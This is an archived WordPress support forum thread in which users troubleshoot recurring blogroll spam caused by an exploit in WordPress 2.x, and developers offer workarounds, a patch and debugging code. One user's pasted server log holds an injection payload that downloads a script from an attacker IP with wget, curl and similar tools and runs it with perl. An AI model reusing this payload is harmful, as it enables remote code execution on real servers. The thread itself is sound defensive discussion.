WordPress.org

Ready to get started?Download WordPress

Forums

blogroll spam on WordPress 2.3 (44 posts)

  1. eweibust
    Member
    Posted 6 years ago #

    I am fighting a new form of spam on my blog. Just when I think I've got things pretty tightly locked the spammers find a new way. I'm getting spam in my blogroll.

    See for yourself (http://erik.weibust.net). I promise I'm not trying to sell male enhancement drugs from my site. It's taken me 12 hours to be able to joke about this, as I was quite pissed when I saw the intrusion.

    Anyhow, I'd love some help on resolving the issue and was thinking this would be a good place to start looking.

    Some background on the problem. I was running WP 2.1 until last night. The first thing that clued me into the problem was I got an email about a new user on my blog on Friday. That freaked me out as I'm the only user, and I didn't add a new user. So I login to the dashboard and immediately removed the user. I spent some time digging around my dashboard and didn't see anything "fishy" so I thought I might be ok.

    Then on Saturday I noticed there was a whole bunch of spam links added to my blogroll. I immediately logged in to the dashboard and removed the links. Then I checked the users tab, expecting to see a new user, there wasn't one. I'm at a loss as to how the links got added without a login to my blog. To be safe I changed my WP admin password.

    Sunday the spam was back. I didn't know what else to do, so I upgraded to WP 2.3 hoping that would help. No dice. Now I have a very generic blog, with a crapload of blogroll spam.

    Please help. I'm guessing the next step is to change the passwords for my db user and my ssh user. I can't change the password right now, I'm at work and can't get through my work proxy to the servers. I'm making the password change as soon as I get home.

    I've checked the sidebar and it looks clean. I program, but not in php, so I'm not 100% sure the sidebar is good. That said, I'm fine with deleting my sidebar and downloading/installing a new one, as I'm now running a completely stripped down template.

    What else should I do/check?

    Thanks...

  2. whooami
    Member
    Posted 6 years ago #

    Are you absolutely confident that those links were added AFTER your upgrade?

    I ask because there was an issue with an earlier version, but that should have been taken care of with 2.3.x

    If it were me, at the VERY least, i would email security@wordpress.org and include any information you can.. server logs, etc..

  3. eweibust
    Member
    Posted 6 years ago #

    whoami, thanks for the quick respone.

    I am absolutely, 100%, sure the links were added after the upgrade. As a matter of fact. I just now deleted the links. I bet within the next couple hours the blogroll spam links will be back.

    I want to make sure I'm clear on what's happened.

    1. I *was* using WP 2.1
    2. Somebody added a new user to my blog
    3. I deleted the user
    4. Somebody added blogroll spam to my blog
    5. I deleted the blogroll spam
    6. Somebody added the blogroll spam, again
    7. I upgraded my blog to WP 2.3
    8. After the upgrade the blogroll spam was still present so I removed
    9. The blogroll spam was added again.

    I hope that helps clear up the timeline.

    I'm about to change my db and ssh password, so maybe that will help, otherwise, I'm expecting to see the blogroll spam.

  4. whooami
    Member
    Posted 6 years ago #

    well do keep us advised, I, for one, am very curious. and send off that e-mail as well.

  5. eweibust
    Member
    Posted 6 years ago #

    Here is my update...

    I changed my db and ssh passwords and I'm still getting the blogroll spam. I've emailed the security@wordpress.org address.

    I'm kind of at a loss of what to do next. I would love any and all suggestions. I'm not about to shut my blog down after 4+ years of postings, but I REFUSE to let it be hacked like this.

    Is it possible to pull out my posts and comments and start over knowing I haven't been hacked? I have no problem with exporting my entrites/content and then deleting every file/db on my host and starting fresh.

    Erik

  6. Samuel Wood (Otto)
    Tech Ninja
    Posted 6 years ago #

    Rename wp-admin/link.php to something else. That should stop it for now.

    Somebody else reported this on trac yesterday, it appears to be a legit exploit that is in the wild. Although I'm uncertain how they added a new user if you don't allow registrations.

    http://trac.wordpress.org/ticket/4627

  7. ceffyl
    Member
    Posted 6 years ago #

    I'm running WP 2.1.2 and have encountered the same problems since this past weekend. I'll try the same solution tonight when I get home.

    My links page is here:
    http://ceffyl.net/wordpress/links/

    Details of what happened here: http://wordpress.org/support/topic/139049?replies=4#post-633352

  8. eweibust
    Member
    Posted 6 years ago #

    Otto42, thanks for the tip. I will try that as soon as I get home tonight (my company proxy blocks me from ssh'ing into my box).

    One other thing. My host, Dreamhost, said that there couldn't be anything wrong on the mysql box, but they specifically said to NOT USE the plugins SimpleTags and Subscribe to Comments, so I have disabled those.

    So as of right now, the only change I've made is disabling all 3rd party plugins. Tonight I will rename my link.php file.

    Thanks... Erik Weibust

  9. ceffyl
    Member
    Posted 6 years ago #

    I'm not using Subscribe To Comments, but I am using the Subscribe2 plugin. I'll try disabling that.

  10. Samuel Wood (Otto)
    Tech Ninja
    Posted 6 years ago #

    Note that that will, of course, break your own ability to add entries to the blogroll as well. But then that's sort of the point, it's just a temporary workaround until a patch is created.

  11. moshu
    Member
    Posted 6 years ago #

    http://trac.wordpress.org/changeset/6256

    this fix has been posted recently

  12. eweibust
    Member
    Posted 6 years ago #

    Great feedback here. Thanks!

    I have two questions.

    1. How does one add a bug fix to an install? (sorry for not googling this before asking question)
    2. Do I still need to rename my links.php if I install this bug fix?

  13. Samuel Wood (Otto)
    Tech Ninja
    Posted 6 years ago #

    1. You download the new, fixed, file and put it in place. There should be a link somewhere to download the new link.php file in "Original Format".

    2. No, that would defeat the point.

  14. whooami
    Member
    Posted 6 years ago #

  15. eweibust
    Member
    Posted 6 years ago #

    Guys, a big fat THANK YOU, to everyone, for all the help. I've applied the new link.php to my site and things appear to be resolved.

    If I have any other problems I'll let you know.

    Thanks...
    Erik Weibust

  16. Root
    Member
    Posted 6 years ago #

    GASP :)

  17. eweibust
    Member
    Posted 6 years ago #

    I hate to do this.... but the fix did not work. I woke up this morning and had 10 more spam blogroll links. :(

    I guess that I should just go ahead and rename links.php and wait for another fix.

    One question, if I rename links.php what do I lose? Will I still have a blogroll, but won't be able to update it? Or, will the blogroll completely disappear from my sidebar?

    Thanks...

  18. Samuel Wood (Otto)
    Tech Ninja
    Posted 6 years ago #

    a) It's "link.php" (in the wp-admin folder), not "links.php". Don't rename the wrong thing.

    b) You'll lose the ability to edit or add to the blogroll in any way.

    Also, the fix should have worked. I suspect that you did not apply the fix correctly... considering that you keep referring to the wrong file name.

  19. eweibust
    Member
    Posted 6 years ago #

    Thanks Otto42,

    I hope you're right on me incorrectly applying the fix. I'll check when I get off work.

    I downloaded a zip file. Unzipped it. Scp'ed the file to my server. Renamed the existing file to link(s).php (not sure, are there two, both link and links?). Lastly, I copied the newly uploaded file to wp-admin dir.

    Erik

  20. eweibust
    Member
    Posted 6 years ago #

    Otto42,

    I believe I've done everything correctly with the fix. Here is what I've done.

    -rw-r--r-- 1 erikweibust pg928284 2506 Oct 16 18:27 link.php
    -rw-r--r-- 1 erikweibust pg928284 2824 Jun 1 19:53 link.php.bak

    I'm not sure what the best way is to show you what I've done other then by showing you the above ls -l.

    What do I need to do now?

    Erik

  21. eweibust
    Member
    Posted 6 years ago #

    One more update. I have renamed the link.php file so hopefully this stops the attacks while the WordPress people can investigate.

    Erik

  22. Samuel Wood (Otto)
    Tech Ninja
    Posted 6 years ago #

    I don't know, that fix should work. I'll investigate it myself this evening.

    Renaming link.php will work, but again, disables your ability to manage the blogroll. Still, it will stop the bleeding for now.

  23. eweibust
    Member
    Posted 6 years ago #

    Otto42, Thanks a MILLION for all the help. Is there anything else I can provide that would be of any help? If so, please let me know.

    Erik

  24. viniciusweb
    Member
    Posted 6 years ago #

    I'm having the exact same problem. I updated from 2.1 to 2.3 three days ago because of blogroll spam but I keep getting spam links.

    Yesterday I found this post and I updated the "link.php" file correctly, but today another 41 spam links showed up in my blogroll.

    For now I'll change my theme so it display the links with static HTML, instead of getting the links from the database.

  25. willyrs
    Member
    Posted 6 years ago #

    I just deleted 300 links from my blogroll. It's the same problem and the background is much the same--we were using 2.2x and found spam on the blogroll. I deleted it, checked all the permissions on folders and then upgraded to 2.3. They keep coming back.

    Our (custom) theme doesn't have a blogroll, so the links don't appear anywhere on the site. I've noticed a lot of incoming links from spam sites, too, so maybe this is a way to game search engines.

    No new admin users have appeared. We do have about 15,000 registered users, however.

    http://www.commondreams.org is our home page--but that's done with html. The stories, however, are all published with WordPress.

  26. Dion Hulse
    WordPress Dev
    Posted 6 years ago #

    Hi willyrs,
    Since installing WP 2.3, Have you modified the link.php file in the wp-admin folder? (Ie. Removed it and uploaded this one in its place: http://svn.automattic.com/wordpress/branches/2.3/wp-admin/link.php ?)

    If you have, and its continueing, Could you drop me a line at wordpress@dd32.id.au

    Hi eweibust/viniciusweb,
    I notice you have user registration disabled on your blogs, Has it allways been like that? Or only just changed to prevent the spam?
    In order to complete the attack at present, the user needs to have an account(Doesnt matter what role) AFAIK,
    Do you have access to your server logs? Can you check to see if there have been any admin entries for about the time the spam is being added?
    If you want some more help in tracing it, you can email me at the above address,

  27. viniciusweb
    Member
    Posted 6 years ago #

    dd32, thank you for your help.

    My blog never had other users. I checked now and the only user is "admin". The password was changed last week, but I don't know if there was more spam after the change (will be watching it now).

    I looked up the server logs and found a lot of entries for IP "195.5.116.246", making POST requests to the "link-add.php" file. This IP is cited by auxesis in http://trac.wordpress.org/ticket/4627

    Besides that, I found some requests like this:

    201.37.71.117 - - [19/Oct/2007:14:36:23 -0700] "GET /blog//wp-pass.php?_wp_http_referer=http://www.chamala.kit.net/tool25.txt?&cmd=cd%20/tmp;rm%20x.txt;wget%20http://201.37.71.117:8090/x.txt;fetch%20http://201.37.71.117:8090/x.txt;lwp-download%20http://201.37.71.1175:8090/x.txt;curl%20-O%20http://201.37.71.117:8090/x.txt;lynx%20http://201.37.71.117:8090/x.txt;perl%20x.txt HTTP/1.1" 503 620 "-" "Mozilla/3.0 (compatible; Indy Library)"

    The "http://www.chamala.kit.net/tool25.txt" points to a PHP script and "http://201.37.71.1175:8090/x.txt" points to a Perl script. I hadn't check the code yet.

    Let me know if you need any other information.

  28. Ryan Boren
    WordPress Dev
    Posted 6 years ago #

    The wp-pass.php GET is a link laundering attempt that we now block.

    I'm not sure how posting to link-add.php would allow this, but I'm digging into it.

  29. Dion Hulse
    WordPress Dev
    Posted 6 years ago #

    > I'm not sure how posting to link-add.php would allow this, but I'm digging into it.
    Neither am i, I get blocked by user_can_access_admin_page(), but i cant find any modifying code anywhere in there.

    hi viniciusweb,

    Could you add some debugging code to the affected pages?(i'm thinking link.php and link-add.php)
    Maybe something like this:

    if ( 'POST' == $_SERVER['REQUEST_TYPE'] ) {
        error_log(print_r($_POST, true));
        global $current_user;
        error_log(print_r($current_user, true));
    }

    You could probably use the mail command too:

    if ( 'POST' == $_SERVER['REQUEST_TYPE'] ) {
        global $current_user;
        wp_mail('me@myaddress.com', 'WP debug', print_r($_POST, true));
        wp_mail('me@myaddress.com', 'WP debug', print_r($current_user, true));
    }

    (If you do that, can you forward the stuff onto me?)

    That goes for anyone who is getting this spam, if you want to help, send some raw information over so we can determine how its getting past.

  30. From a review of the old code and the patch proposed for 2.3.1 I can't see how the links are getting add by the POST requests on link.php unless the requests are being made by a user with the extra capability check for manage_links at the top of link.php as this is already checked later in the code path before the link is added in edit_link (called by add_link for link additions).

    It looks like therefore the POST request must be coming in with valid cookies for a high level user.

    Can those who have been affected by this issue confirm:

    1. What version of WordPress you were running?
    2. What plugins you have installed
    3. If user registration was enabled
    4. If you found extra users had been added at the time this issue occured

    Cheers westi

Topic Closed

This topic has been closed to new replies.

About this Topic